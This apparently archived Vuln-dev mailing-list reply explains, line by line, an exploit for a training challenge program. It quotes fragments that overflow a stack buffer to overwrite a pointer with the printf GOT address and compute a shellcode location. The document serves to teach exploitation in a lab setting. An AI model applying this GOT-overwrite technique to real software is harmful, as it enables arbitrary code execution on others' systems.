Re: [Vuln-dev Challenge] Challenge #2

["Janus N." Tøndering <janus () bananus dk>]

On Sun, 2003-05-25 at 12:52, Diode Trnasistor wrote:
> ### i'd like to know how exactly you determined that
> ### the actuall size allocated is 108
> > #define BFSIZE 108          /* actual size allocated
> > on the stack 
The easy way: I added the line
printf("%d\n", (int)&bfp-(int)&buf);
at the beginning of main (after variable declaration of course) to get
the size. You could also compile to assembly (gcc -s) and examine that.
Now just run the program and it will tell you the size (this does not
work the same way with memory on the heap since there typically is some
overhead for each chunk).

> ### ok got this too, after the bfp is the saved eip
> ### ..right? Why did you not mention the eip?
> ### is it irrelevant to this code somehow?
> > /* stack layout is like this i vulndev-2:
> >      [  f1  ][  buf  ][  bfp  ]
> > */
eip (you mean the ret pointer?) is irrelevant. What I want to do is to
overwrite bfp. There may be a lot of other interesting things you
overflow on the stack besides eip. The line that says
if (fgets(bfp, BFSIZE, f1) == NULL)
will write to the memory pointed to by bfp. So if we control bfp we can
make the program write anywhere in memory.

>         ### don't see why this is so important.
>         ### why is it important?
> >     /* make sure db.log does not exist already */
> >     unlink("db.log");
We will use the first BZSIZE chars of db.log as what should be written
to memory at bfp since this is something we control (the program only
reads the first BFSIZE chars of db.log).

> >     /* create first argument */
>         ### make p point to the adress or arg1
>         ### which will overwrite the first byte of
>         ### saved ebp.
> >     p = arg1+BFSIZE;
Actually not saved ebp but the bfp pointer as explained above and shown
in the stack layout diagram. Forget the saved ebp.

>         ### fill argv1 with A's up to the byte
>         ### pointed to by p.
> >     memset(arg1, 'A', BFSIZE);
>         ## ...MEDIC! what is this?  What are you doin?
>         ## WHY are you doing it? omg halp!
>         ## Asigning the adress of printf_got-2 to
>         ## to the adress pointed to by p?
> >     *((void**)p) = (void*)(printf_got - 2); /* to avoid
We want to set (overflow) the bfp pointer with the address of the printf
command. We subtract two because the db.log file starts with two ';;'.
These will then be written two bytes before printf code starts ---
corrupting whatever is there (but we really don't care about that).

> >     /* calculate address of shellcode. Assumes fixed
> > stack-base
> >              and Linux os */
>         ## few questions on this one.
>         ## where did you get the 0xbffffffa?
>         ## also how did you get it.
>         ## Why are we subtracting the lenght of 
>         ## the name of the vulnerable program from it?
>         ## And worse yet we're subtracting the lenght
>         ## of the shellcode from that, so now i'm 
>         ## really lost.  I'm inclined to think this
>         ## has something to do with the environment.
>         ## but i can't for the life of me figure out 
>         ## what.
> >     saddr = 0xbffffffa - strlen(victim) -
> > strlen(shellcode);
Take a look at Murat's: Buffer overflows de mystified: 
http://www.enderunix.org/docs/eng/bof-eng.txt
>         ## ok make argv2 point to value of saddr.
> >     *((char**)arg2) = (char *)(saddr);
> >     
> >     printf("[i] shellcode is at 0x%08x\n", saddr);
> >     printf("[i] printf GOT is 0x%08x\n", printf_got);
> >     printf("[i] using 0x%08x as GOT\n", printf_got -
> > 2);
> >     
Hope this helps.

Regards,
Janus

-- 
Janus N. Tøndering <janus () bananus dk>